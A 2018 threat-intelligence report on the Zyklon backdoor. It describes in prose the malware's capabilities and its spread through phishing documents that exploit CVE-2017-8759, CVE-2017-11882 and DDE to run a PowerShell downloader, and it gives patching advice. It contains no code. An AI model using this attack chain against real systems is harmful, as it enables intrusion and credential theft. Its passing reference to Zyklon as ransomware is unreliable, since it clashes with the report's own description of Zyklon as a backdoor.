Zyklon Malware

TACTICAL CYBER INTELLIGENCE REPORT

Actor Type: II
Serial: TR-18-025-002
Countries: CN, IN
Report Date: 20180125

Zyklon Malware

Zyklon is a family of malware which first emerged in early 2016 before going dormant until January 2017.  Attackers then exploited several vulnerabilities in the Microsoft Office software suite in order to spread Zyklon malware.[1]

The 2017 Zyklon malware attacks targeted insurance, financial services and telecommunications companies. Zyklon is a publicly available, full-featured “backdoor,” capable of keylogging, password harvesting, downloading and executing additional plugins, conducting distributed denial-of-service (DDoS) attacks, and self-updating/self-removal.  Zyklon is capable of communicating with its command and control (C2) server over The Onion Router (Tor) network.  The malware can download several plugins, some of which include features like cryptocurrency mining and password recovery through browsers and email software.  Zyklon also provides a very efficient mechanism to monitor the malware it spread and its impact.  Users have been exposed to the Zyklon malware primarily through spam emails that include a ZIP file attachment, with a DOC file containing code to download and install the malware.

Attack Flow and Impact

Once the Zyklon malware has infected a machine, it has the potential to cause extensive damage in a variety of ways.  This to include harvesting passwords and other sensitive information via keylogging and data scraping, utilizing the machine's hardware resources for cryptocurrency mining operations, and setting an infected system as part of a botnet for launching DDoS (distributed denial-of-service) attacks.

According to a recently published cyber report, the attackers behind the campaign are leveraging the following three vulnerabilities in Microsoft Office, which execute a PowerShell script on the targeted computers to download the final payload from its C2 server:

1) .NET Framework RCE Vulnerability (CVE-2017-8759) — This remote code execution vulnerability exists when Microsoft .NET Framework processes an untrusted input, allowing an attacker to take control of an affected system by tricking victims into opening a specially crafted malicious document file sent over an email.  Microsoft already released a security patch for this flaw in September 2017 updates.

2) Microsoft Office RCE Vulnerability (CVE-2017-11882) — A 17-year-old memory corruption flaw that Microsoft patched in a November 2017 patch update that allows a remote attacker to execute malicious code on the targeted systems without requiring any user interaction after opening a malicious document.

3) Dynamic Data Exchange Protocol (DDE Exploit) — This technique allows attackers to leverage a built-in feature of Microsoft Office, called DDE, to perform code execution on the targeted device without requiring Macros to be enabled or memory corruption.

DDE is a protocol that establishes how apps send messages and share data through shared memory.  However, attackers have found great success over the past year with macro-based malware exploiting DDE to launch droppers, exploits and malware.[2]

As explained by researchers, attackers are actively exploiting these three vulnerabilities to deliver Zyklon malware using spear phishing emails, which typically arrive with an attached ZIP file containing a malicious Office doc file.  Once opened, the malicious doc file equipped with one of these vulnerabilities, immediately runs a PowerShell script, which eventually downloads the final payload, Zyklon HTTP malware, onto the infected computer.  The injected code is responsible for downloading the final payload from the server. The final stage payload is a PE executable compiled with .Net framework.  Interestingly, the PowerShell script connects to a dotless IP address (example: http://3627732942) to download the final payload.[3]

Mitigation and Prevention Strategies

It is important to keep your software updated. The best way to protect yourself and your organization from such malware attacks is always to be suspicious of any uninvited document sent via an email and never click on links inside those documents unless adequately verifying the source.

For Zyklon infected systems, removal and restoration of files is often a multi-step process, particularly if the computer's files have been encrypted as part of a Zyklon ransomware attack. Third-party utilities like Recuva, Malwarebytes, and/or Spy Hunter are typically needed as part of the Zyklon removal and recovery process.

An essential key to avoiding potential Zyklon infection is catching up and staying current with important security patches for Microsoft Office as well as your operating system and other key software programs.  Security patches for Microsoft Office that protect against Zyklon are available.

Contact the Wapack Labs for more information: 603-606-1246, or feedback@wapacklabs.com.

 

[1] https://www.webopedia.com/TERM/Z/zyklon-malware.html

[2] https://threatpost.com/attackers-use-microsoft-office-vulnerabilities-to-spread-zyklon-malware/129503/

[3] https://thehackernews.com/2018/01/microsoft-office-malware.html

E-mail me when people leave their comments –

You need to be a member of Red Sky Alliance to add comments!